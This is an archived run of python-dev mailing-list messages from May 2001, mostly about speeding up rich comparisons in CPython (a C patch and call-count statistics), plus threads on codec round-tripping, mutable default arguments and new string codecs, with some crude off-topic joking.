Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEGKKCAA.tim.one@home.com>

Making the 5am email concrete, this is what I meant:

Index: object.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v
retrieving revision 2.131
diff -c -r2.131 object.c
*** object.c	2001/05/11 03:36:45	2.131
--- object.c	2001/05/15 23:39:24
***************
*** 835,841 ****
  		}
  	}
  	else {
! 		res = do_richcmp(v, w, op);
  	}
  	compare_nesting--;
  	return res;
--- 835,863 ----
  		}
  	}
  	else {
! 		cmpfunc f;
! 		if (v->ob_type == w->ob_type
! 		    && RICHCOMPARE(v->ob_type) == NULL
! 		    && (f = v->ob_type->tp_compare) != NULL)
! 		{
! 			int c = (*f)(v, w);
! 			if (c < 0 && PyErr_Occurred())
! 				res = NULL;
! 			else {
! 				switch (op) {
! 					case Py_LT: c = c <  0; break;
! 					case Py_LE: c = c <= 0; break;
! 					case Py_EQ: c = c == 0; break;
! 					case Py_NE: c = c != 0; break;
! 					case Py_GT: c = c >  0; break;
! 					case Py_GE: c = c >= 0; break;
! 				}
! 				res = c ? Py_True : Py_False;
! 				Py_INCREF(res);
! 			}
! 		}
! 		else
! 			res = do_richcmp(v, w, op);
  	}
  	compare_nesting--;
  	return res;

That's a local change to PyObject_RichCompare, taking a fast path for most
scalar types (which don't have richcmps but do have tp_compare today).  On my
Win98 box reproducible timings are impossible, but it obviously chops out
layers and layers of function calls and redundant tests when it triggers.
That appears to be more often than not across all apps I've tried, from 60%
of PyObject_RichCompare calls to nearly 100%.


From tim.one at home.com  Wed May 16 02:01:05 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 20:01:05 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: <200105152136.QAA00489@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com>

[Tim]
> BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
> because it won't believe there's any difference unless Py_EQ
> returns false for some corresponding elements:
>
> >>> class C:
> ...     def __lt__(x, y): return 1
> ...     __eq__ = __lt__
> ...
> >>> C() < C()
> 1
> >>> (C(),) < (C(),)
> 0
> >>>
>
> That doesn't make sense -- provided you believe the defn. of C
> makes sense.

[Guido]
> I think in this example the problem is with C, not with the tuple
> algorithm.

I can live with that.

> The question is, what are you going to do otherwise?  You
> could test for < first, == second -- but that means twice as many
> comparisons, and for reasonably-behaved items it makes no difference
> at all.

The question remaining is how much of this list/tuple richcmp behavior is
guaranteed by the language and how much is just implementation-dependent
fuzz.

For a more vanilla example, I removed the EQ/NE "lengths differ?" tuple
richcmp early-exit test because I never found code that made it trigger. (but
tons of code that gets there without triggering).  But this has semantic
implications too:  an implementation without the early exit may call
user-defined comparison routines that raise exceptions when comparing tuples
of different lengths now.  Do you care?  (I don't.)


From tim.one at home.com  Wed May 16 02:37:56 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 20:37:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> I'd like to add another data point, answering the question what types
> are most frequently compared.

That varies wildly by app.  I have apps where int compares *overwhelmingly*
dominate, others where float compares do, many where strings compares do, and
the last code I wrote for Zope spends most of its (very substantial) time
doing lookups of "object ids" in dicts.  In Python terms, those are Pythong
lon (unbounded) ints today, and potentially Python ints on 64-bit boxes, and
that's another case where ceval.c's special-casing of int compares is
impotent.

Heck, sort a large homogeneous array once, and whatever element type that
array has will likely dominate comparisons for the whole app!

That's why I'm so keen to chop out a half dozen layers of blubber for *all*
types that don't play the richcmp game (which today includes every type I
mentioned above).

> The first set of data is for running the Python testsuite.
>
> riches      3040952  # Calls to PyType_RichCompare
> eqs         2828345  # Calls where the types are equal
>
> String      2323122
> Float        141507
> Int          125187
> Type          99477
> Tuple         84503
> Long          30325
> Unicode       10782
> Instance       9335
> List           2997
> None            383
> Class           318
> Complex         219
> Dict             57
> Array            49
> WeakRef          34
> Function         11
> File             11
> SRE_Pattern      10
> CFunction         9
> Lock              8
> Module            1
>
> So strings cover 82% of all the compare calls of equally-typed
> objects, followed by floats with 5%. Those calls together cover 93% of
> the richcompare calls.
>
> Since this might give a blurred view of what is actually used in
> applications,

Note that the top 4 types don't have a tp_richcompare slot today.  The tuples
are likely composed of simple scalar types, and the latter benefit too.  But
as above, we can't say anything in advance about the *specific* types a given
app is going to compare most often.  There is no "typical app" in that
respect.

> I ran the PyXML testsuite with that python binary
> also. Leaving out types that are not used, I get
>
> riches        88465
> eqs           59279
>
> String        48097
> Int            5681
> Type           3170
> Tuple           760
> List            492
> Float           332
> Instance        269
> Unicode         243
> None            225
> SRE_Pattern       4
> Long              3
> Complex           3
>
> The first observation here is that "only" 67% of the calls are with
> equally-typed objects.

Someone who cares about the speed of PyXML would be well advised to figure
out why <0.9 wink>:  there's no scheme on the horizon that will speed
mixed-type comparisons one whit.

> Of those, 80% are with strings, 9% with integers.

XML is a string-crunching app, right?

> The last example is idle, where I just did an "import httplib", for
> fun.
>
> riches        50923
> eqs           49882
>
> String        31198
> Tuple          8312
> Type           7978
> Int            1456
> None            600
> SRE_Pattern     210
> List            122
> Instance          4
> Float             1
> Instance method   1
>
> Roughly the same picture: 97% calls with equally-typed objects, of
> those 62% strings, 3% integers. Notice the 15% for tuples and types,
> each.

Surprising!

> So to speed-up the common case clearly means to speed-up string
> comparisons.

The only thing the apps I've tried have in common is that the types compared
most often do have tp_compare but not tp_richcompare functions.  The test
suite, XML and IDLE are all heavy string-slingers.

> If I'd need to optimize anything else afterwards, I'd look into type
> objects - most likely, they are compared for EQ, which can be done
> nicely and directly in a tp_richcompare also.

Would do just as well to give them a one-liner tp_compare function (in
conjunction with the posted patch).

> Those two optimizations together would give a richcompare to 95% of
> the objects in the IDLE case.

Since that's the exact opposite of what I want to do, it's at least
interesting <wink>.  Whatever, there needs to be a (very) fast path, and it
needs to pick on something that all common types implement, including at
least strings, ints, longs, floats and-- I guess --type objects.

I don't know about other people, but I have lots of code that uses the cmp()
function heavily.  That path has also gotten bloated, and tries each of
Py_EQ, Py_LT and Py_GT in turn now, hoping for *one* of them to say "yes".
It does this now even if the tp_compare slot is defined.  The only thing
that's saving cmp()-slinging code from major sloth now is that the basic
types do *not* implement tp_richcompare, so try_rich_to_3way_compare gets out
early (before doing the three-way Py_EQ etc dance).  But give the basic
scalar types richcmp functions, and cmp() will slow down a lot (unless more
hacks are added to stop that).


From greg at cosc.canterbury.ac.nz  Wed May 16 03:58:05 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 16 May 2001 13:58:05 +1200 (NZST)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
Message-ID: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>

Tim Peters <tim.one at home.com>:

> In Python terms, those are Pythong lon (unbounded) ints today
                             ^^^^^^^
What Pythonistas wear on their feet?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From esr at thyrsus.com  Wed May 16 04:27:38 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Tue, 15 May 2001 22:27:38 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Wed, May 16, 2001 at 01:58:05PM +1200
References: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com> <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>
Message-ID: <20010515222738.A9996@thyrsus.com>

Greg Ewing <greg at cosc.canterbury.ac.nz>:
> Tim Peters <tim.one at home.com>:
> 
> > In Python terms, those are Pythong lon (unbounded) ints today
>                              ^^^^^^^
> What Pythonistas wear on their feet?

No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.

(Yes, I know some sexy lady Pythonistas.  No, you can't have their
phone numbers.  Pthfthfthpht...)
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Question with boldness even the existence of a God; because, if there
be one, he must more approve the homage of reason, than that of
blindfolded fear.... Do not be frightened from this inquiry from any
fear of its consequences. If it ends in the belief that there is no
God, you will find incitements to virtue in the comfort and
pleasantness you feel in its exercise...
	-- Thomas Jefferson, in a 1787 letter to his nephew


From tim.one at home.com  Wed May 16 09:14:25 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 03:14:25 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3B00E98E.1C44FF5@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHLKCAA.tim.one@home.com>

[MAL]
> Round-tripping is obviously very important if you use Unicode
> as basis for working on text.

Since I use 7-bit ASCII exclusively, I've been using

    encode = decode = lambda x: x

I haven't proved that's round-trippable, but haven't bumped into an exception
yet.

> I don't know about the reasoning behind making cp875 fail the
> round-trip -- Unicode certainly provides means to make mappings
> round-trip safe (e.g. by reverting to the private Unicode
> char. point areas).

Then I ignorantly but confidently (indeed, with the cheery confidence only
the truly ignorant can truly enjoy!) vote for your approach that maps the
non-round-trippable cp875 code points to None.  Better safe than sorry, by
default.  Else 6 of the 7 ambiguous chars will be silent surprises by
default.


From tim.one at home.com  Wed May 16 09:25:28 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 03:25:28 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151527.KAA28734@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEHLKCAA.tim.one@home.com>

[Guido]
> PEP 207 is quite explicit that == and != are not to be assumed each
> other's complement.  It is silent on the x==x issue but the PEP
> mentions IEEE 754 so I agree that this also shouldn't be cut short.

It's explicit about x==x too:

    (Note: Python currently assumes that x==x is always true
    and x!=x is never true; this should not be assumed.)

That's from the end of point #4, under "Proposed Resolutions".  I agreed
then, and still do <wink>.


From martin at loewis.home.cs.tu-berlin.de  Wed May 16 09:28:45 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 09:28:45 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.26334.610144.846269@slothrop.digicool.com> (message from
	Jeremy Hylton on Tue, 15 May 2001 13:26:54 -0400 (EDT))
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com>
Message-ID: <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>

> Sounds like we ought to do a search-and-destroy on type comparisons,
> replacing with isinstance() where possible.

At least in my applications, this is unfortunately not possible: I
want a test for byte-string-or-unicode-string. This could be done with
two isinstance calls, but that is certainly less efficient.

Marc-Andre once proposed a type representing the immediate supertype
of both byte strings and unicode strings; let's call it abstract string.
Then I could write isinstance(e, types.AbstractString).

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Wed May 16 09:24:56 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 09:24:56 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.42180.401918.223487@anthem.wooz.org> (barry@digicool.com)
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.42180.401918.223487@anthem.wooz.org>
Message-ID: <200105160724.f4G7OuF01764@mira.informatik.hu-berlin.de>

>     GvR> I'm curious where the frequent comparisons of types come
>     GvR> from.
> 
> Not to mention the several hundred comparisons to None.

This is harder to analyse; I set a gdb breakpoint on the place where
RichCompare gets PyType_Type, then tried to see what it does, then
ignoring the breakpoint a few times. This is what I've found; I may
miss important cases.

In PyXML, the expression

   type(e) in [types.StringType, types.UnicodeType]

is frequently computed. This is a sequence_contains, which in turn does two
Py_EQ tests. In addition, compile.c:com_add has

   t = Py_BuildValue("(OO)", v, v->ob_type)
   PyDict_GetItem(dict, t)

Again, the dictionary lookup performs Py_EQ on the tuples, which does
Py_EQ on the elements.

This also accounts for the RichCompare calls which receive None: v may
be None, here, so t is (None, type(None)).

In IDLE, the situation is similar. com_add produces many compares with
types. In addition, sre.compile has

   type(s) in sre_compile.STRING_TYPES

which is the same test as the PyXML one. Finally, there is a
type-in-typetuple test inside Tkinter._cnfmerge.

Regards,
Martin


From i_sofer at yahoo.com  Wed May 16 09:53:25 2001
From: i_sofer at yahoo.com (Idan Sofer)
Date: 16 May 2001 10:53:25 +0300
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
Message-ID: <200105160756.KAA29616@alpha.netvision.net.il>

Hello.

I have found a rather annoying bug in Python, present in both Python 1.5
and Python 2.0.

If a class has an argument with a default of an empty dictionary, then
all instances of the same class will point to the same dictionary,
unless the dictionary is explictly defined by the constructor.

I attach a piece of code that demostrates the problem
-------------- next part --------------
A non-text attachment was scrubbed...
Name: test.py
Type: text/x-python
Size: 1197 bytes
Desc: not available
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010516/15c1b25b/attachment-0001.py>

From martin at loewis.home.cs.tu-berlin.de  Wed May 16 10:02:01 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 10:02:01 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
Message-ID: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de>

> Since that's the exact opposite of what I want to do, it's at least
> interesting <wink>.

I'll put a patch on SF soon which does what you want to do, i.e. tries
tp_compare as the first thing if tp_richcompare is not there. Even
with this patch, your code is faster if strings have a
richcompare. Without richcompare, I get

0.720
0.720
0.720
0.730
0.720
0.720
0.730
0.720
0.720
0.730

With it, I get

0.710
0.720
0.720
0.710
0.710
0.720
0.710
0.710
0.710
0.720

Given that stock CVS python is in the 0.78 range, the different is
neglectable, though.

Regards,
Martin


From larsga at garshol.priv.no  Wed May 16 10:19:10 2001
From: larsga at garshol.priv.no (Lars Marius Garshol)
Date: 16 May 2001 10:19:10 +0200
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
In-Reply-To: <200105160756.KAA29616@alpha.netvision.net.il>
References: <200105160756.KAA29616@alpha.netvision.net.il>
Message-ID: <m3sni51zb5.fsf@lambda.garshol.priv.no>

* Idan Sofer
| 
| If a class has an argument with a default of an empty dictionary,
| then all instances of the same class will point to the same
| dictionary, unless the dictionary is explictly defined by the
| constructor.

This is part of the language semantics, and so not a bug. The default
values of optional arguments are evaluated when the function/method is
compiled. You may consider the semantics ill-advised, but it is
intentional.
 
| class foo:
|     
|     def __init__(self,attribs={}):
| 	self.attribs=attribs;
| 	return None;

I usually write this as:

class Foo:

  def __init__(self, attribs = None):
    self.attribs = attribs or {}

--Lars M.


From fredrik at pythonware.com  Wed May 16 10:18:44 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Wed, 16 May 2001 10:18:44 +0200
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
References: <200105160756.KAA29616@alpha.netvision.net.il>
Message-ID: <011401c0dde0$d4adb2e0$0900a8c0@spiff>

Idan Sofer wrote:
>
> I have found a rather annoying bug in Python, present in both Python 1.5
> and Python 2.0.
>
> If a class has an argument with a default of an empty dictionary, then
> all instances of the same class will point to the same dictionary,
> unless the dictionary is explictly defined by the constructor.

maybe you should check the documentation (or the FAQ) before
submitting bugs?

    http://www.python.org/doc/current/ref/function.html

    Default parameter values are evaluated when the function
    definition is executed. This means that the expression is evaluated
    once, when the function is defined, and that that same ``pre-
    computed'' value is used for each call. This is especially important
    to understand when a default parameter is a mutable object,
    such as a list or a dictionary: if the function modifies the object
    (e.g. by appending an item to a list), the default value is in
    effect modified.

Cheers /F

PS. when you do report real bugs, please use the bug tracker:

    http://sourceforge.net/tracker/?group_id=5470&atid=105470

"is this a bug" questions should be sent to comp.lang.python


From tim.one at home.com  Wed May 16 10:41:47 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 04:41:47 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>

[Martin]
> Producing numbers is easy :-)

If only making sense of them were too <0.6 wink>.

> I've instrumented my version where string implements richcmp, and
> special-cases everything I can think of.

1. String objects are also equal despite being different objects,
   if their ob_sinterned pointers are equal and non-NULL.  So if
   you're looking for every trick in & out of the book, that's
   another one.

2. But the real goal is to add only those special cases that in
   combination yield the largest net win, and that's much harder
   to determine (since there are no typical apps, and it's very
   hard to quantify the tradeoffs here in a credible x-platform
   x-app way).

> Counting is done for running the test suite. With this, I get
>
> Calls to string_richcompare:   2378660
> Calls with different types:      33992 (ie. one is not a string)
> Calls with identical strings:   120517
> Calls where lens decide !EQ:   1775716
> ----------------------------
> Calls richcmp -> oldcomp:       448435
> Total calls to oldcomp:        1225643
> Calls oldcomp -> memcmp:        860174
>
> So 5% of the calls are with identical strings, for which I can
> immediately decide the outcome.

But also at the cost of doing a fruitless compare and branch in 95% of calls.
There isn't enough data to guess whether this is a net win or a net loss
(compared to leaving this special case out).

Note that if the "identical string pointers" special case is a net win, it
would be effective inside oldcomp instead (i.e., you don't need a richcompare
slot to exploit it); indeed, it may be more effective there, since there are
some 800,000 calls to oldcmp that *didn't* come from richcmp, and oldcmp
doesn't check for pointer equality now (but PyObject_Compare does, so there
didn't *used* to be any point to it in oldcmp).

Any idea where those 800,000 virgin calls to oldcomp are coming from?  That's
a lot.

> 75% can be decided in terms of the string lengths, which leaves ca. 19%
> for cases where lexicographical comparison is needed.

So about 1 in 5 times there's also the additional (wrt just calling oldcmp
all the time) overhead of a second function call (i.e., the call to oldcmp
made by richcmp).

> In those cases, the first byte decides in 30%. If I remove the test
> for "len decides !EQ", I get
>
> #riches:                       2358322
> #riches_ni:                      34108
> #idents_decide:                 102050
> #lens_decide:                        0
> --------------------------------------
> rest(computed):                2222164
> #comps:                        2949421
> #memcmps:                       917776
>
> So still, ca. 30% can be decided by first byte.

Sorry, I couldn't follow this part, except noting that 917776 is about 30% of
2949421, in which case I would have expected you to say that 70% can be
decided by first byte.

> It still appears that the total number of calls to memcmp is higher
> when the length is not taken into consideration.

Since 917776 is larger than the earlier 860174, isn't that plain?  BTW, some
compilers inline memcmp, so assuming it's "a call" is a x-platform trap; of
course assuming it *isn't* is also a x-platform trap.

> To verify this claim, I've counted the cases where the length
> decides the outcome, but looking at the first byte also had:
>
> lens_decide:                    1784897
> lens_decide_firstbyte_wouldhave:1671148
>
> So in 6% of the cases, checking the length alone gives a decision
> which looking at the first byte doesn't; plus it saves a function
> call.

OTOH, 19% of all richcmp calls ended up calling oldcmp too, so the *net*
effect is muddy at best.

> To support the thesis that Py_EQ is the common case for strings, I
> counted the various operations:
>
> pyEQ:2271593
> pyLE:9234
> pyGE:0
> pyNE:20470
> pyLT:22765
> pyGT:578

This clearly wasn't doing much sorting of strings (or of tuples containing
strings, etc) -- .sort() never uses pyEQ (it only uses pyLT).

> Now, that might be flawed since comparing strings for equal is
> extremely frequent in the testsuite. To give more credibility to the
> data, I also ran setup.py with my instrumented ./python:

In the absence of non-trivial use of sorting or the bisect module or one of
the search tree modules out there, it's easy to buy that PyEQ is most common
for strings.  What's not clear is that adding a rich comparison slot actually
helps overall (as compared to continuing to let string_compare() handle it,
and if the pointer equality test actually saves more than it costs, adding it
there instead).  It's clearer that this is going to hurt sorting (& bisect
etc), by adding yet another layer of function call to get Py_LT resolved (as
for dict compares too, the string richcmp can't do anything to speed up Py_LT
that string oldcmp can't do just as efficiently -- indeed, that's the great
advantage oldcmp's "compare first character" test had:  that *can* decide
Py_LT in one byte much of the time (but length comparison cannot)).

Note too earlier mail about how adding a richcmp slot to strings will
suddenly slow cmp(string1, string2) (which is the usual way to program a
search tree, because cmp() *used* to call a string comparison routine only
once; but after adding a richcmp slot, each cmp(string1, string2) will call
the richcmp slot from 1 thru 3 times (data-dependent)).

> ...
> That shows that optimizing for Py_NE is not worth it. With these data,
> I'll upload a patch to SF.

Which is here:

http://sourceforge.net/tracker/index.php?func=detail&aid=424335&
    group_id=5470&atid=305470

Heh:  let's grab all the ugly URLs off of SourceForge, stick them in a giant
list, and sort them.  Can't think of a more typical app than that <wink>.

Thanks for the work, Martin!


From tim.one at home.com  Wed May 16 10:51:17 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 04:51:17 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.46090.203278.397835@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEHPKCAA.tim.one@home.com>

[Barry A. Warsaw]
> ...
> from types import StringType
> import time
> r = range(1000000)
>
> def one(r=r):
>     x = 'hello'
>     t0 = time.time()
>     for i in r:

Random clue:  when you're too lazy to try to subtact out loop overhead (not a
knock, I am too), you may have better luck with

    r = [1] * 1000000

than

    r = range(1000000)

The reason is that the former way gets to keep incref'ing and decref'ing a
single object (as it's repeatedly bound to "i" across iterations), instead of
slobbering all over memory inc'ing and dec'ing a million distinct objects.

there's-as-an-art-to-doing-nothing-quickly-ly y'rs  - tim


From tim.one at home.com  Wed May 16 10:56:56 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 04:56:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010515222738.A9996@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>

[poor Tim]
> In Python terms, those are Pythong lon (unbounded) ints today
                             ^^^^^^^
[Greg Ewing]
> What Pythonistas wear on their feet?

[Eric S. Raymond]
> No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.

Eric wins!  That's indeed what I was thinking of.  I'm surprised nobody asked
what a lon was.  But not as surprised that I didn't try to blame this on a
Outlook 2000 bug.

> (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> phone numbers.  Pthfthfthpht...)

Too much work anyway.  They can have mine:  703 758 8258.

but-they-better-*really*-love-python-cuz-i-give-quizzes-ly y'rs  - tim


From esr at thyrsus.com  Wed May 16 11:17:09 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 16 May 2001 05:17:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>; from tim.one@home.com on Wed, May 16, 2001 at 04:56:56AM -0400
References: <20010515222738.A9996@thyrsus.com> <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>
Message-ID: <20010516051709.C11602@thyrsus.com>

Tim Peters <tim.one at home.com>:
> [poor Tim]
> > In Python terms, those are Pythong lon (unbounded) ints today
>                              ^^^^^^^
> [Greg Ewing]
> > What Pythonistas wear on their feet?
> 
> [Eric S. Raymond]
> > No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.
> 
> Eric wins!  That's indeed what I was thinking of.  I'm surprised nobody asked
> what a lon was.  But not as surprised that I didn't try to blame this on a
> Outlook 2000 bug.
> 
> > (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> > phone numbers.  Pthfthfthpht...)
> 
> Too much work anyway.  They can have mine:  703 758 8258.

Hmmm...now, which one of them should I try to talk into a snakeskin bikini?

Duh.  Answer obvious: the one I can talk *out* of a snakeskin bikini most 
rapidly afterwards.  Then I'll give her your number -- that is, if
I don't get too, er, distracted.

	seeming-like-a-good-time-to-practice-my-Timlike-wink'ly yours,
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Every Communist must grasp the truth, 'Political power grows out of
the barrel of a gun.'
        -- Mao Tse-tung, 1938, inadvertently endorsing the Second Amendment.


From mal at lemburg.com  Wed May 16 11:29:49 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:29:49 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCGEHLKCAA.tim.one@home.com>
Message-ID: <3B02488D.415BA95F@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Round-tripping is obviously very important if you use Unicode
> > as basis for working on text.
> 
> Since I use 7-bit ASCII exclusively, I've been using
> 
>     encode = decode = lambda x: x
> 
> I haven't proved that's round-trippable, but haven't bumped into an exception
> yet.

For character map codecs the complete range(256) of possible
input characters should pass the round-trip test, that is

	encoded text -> Unicode -> encoded text

should result in the identiy mapping for all c in map(chr,range(256)).
 
> > I don't know about the reasoning behind making cp875 fail the
> > round-trip -- Unicode certainly provides means to make mappings
> > round-trip safe (e.g. by reverting to the private Unicode
> > char. point areas).
> 
> Then I ignorantly but confidently (indeed, with the cheery confidence only
> the truly ignorant can truly enjoy!) vote for your approach that maps the
> non-round-trippable cp875 code points to None.  Better safe than sorry, by
> default.  Else 6 of the 7 ambiguous chars will be silent surprises by
> default.

I will check in a patch which moves the building logic for encoding
maps to codecs.py. This will simplify the task of choosing the
"right" solution. Currently I'm in favour of:

def make_encoding_map(decoding_map):

    """ Creates an encoding map from a decoding map.

        If a target mapping in the decoding map occurrs multiple
        times, then that target is mapped to None (undefined mapping),
        causing an exception when encountered by the charmap codec
        during translation.

        One example where this happens is cp875.py which decodes
        multiple character to \u001a.

    """
    m = {}
    for k,v in decoding_map.items():
        if not m.has_key(v):
            m[v] = k
        else:
            m[v] = None
    return m

Perhaps we should also have a codecs.finalize_decoding_map() API
in codecs.py which checks the decoding map and postprocesses
it in case it finds a problem ?!

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Wed May 16 11:32:36 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:32:36 +0200
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
		<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
		<200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>
Message-ID: <3B024934.58232325@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Sounds like we ought to do a search-and-destroy on type comparisons,
> > replacing with isinstance() where possible.
> 
> At least in my applications, this is unfortunately not possible: I
> want a test for byte-string-or-unicode-string. This could be done with
> two isinstance calls, but that is certainly less efficient.
> 
> Marc-Andre once proposed a type representing the immediate supertype
> of both byte strings and unicode strings; let's call it abstract string.
> Then I could write isinstance(e, types.AbstractString).

I'm still holding on to that idea... hopefully, Guido's type
checkins will make this possible in 2.2 or 2.3. The same
should then be done for numbers, sequences and mappings (all
abstract "types" defined in abstract.c).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Wed May 16 11:34:40 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:34:40 +0200
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
Message-ID: <3B0249B0.5DD10A4C@lemburg.com>

Tim Peters wrote:
> 
> [Martin]
> > Producing numbers is easy :-)
> 
> If only making sense of them were too <0.6 wink>.

FYI, I've added a few compare tests to pybench which now is
available as version 0.9. You can download it from my Python
page.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mwh at python.net  Wed May 16 12:53:16 2001
From: mwh at python.net (Michael Hudson)
Date: 16 May 2001 11:53:16 +0100
Subject: [Python-Dev] Easy codec access
In-Reply-To: Guido van Rossum's message of "Tue, 15 May 2001 11:35:09 -0500"
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com>
Message-ID: <m31yppo99f.fsf@atrus.jesus.cam.ac.uk>

Guido van Rossum <guido at digicool.com> writes:

> > I've just checked in a set of patches which implement the new
> > .decode() method along with a couple of useful codecs.
> 
> Cool!

Indeed.  Good idea, Marc!

This is a bit unfriendly though:

>>> "bobbins".encode("gzip")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
    raise SystemError,\
SystemError: module "encodings.gzip" failed to register

I thought SystemErrors shouldn't ever happen (isn't it what gets
raised for an illegal opcode, for example?).
 
> > To see just how easy it is to write codecs, please have
> > a look at the string codecs I added in this patch (e.g.
> > zlib_codec.py or hex_codec.py). I am pretty sure that there
> > are a lot more useful things in the standard lib which could
> > benefit from these easy-to-use interfaces.
> 
> As an excercise, I added a quoted-printable codec.  It was easy
> indeed!

urlencode would be nice.  Maybe re.escape, too.  html entities?
That's probably a bigger can of worms, but 

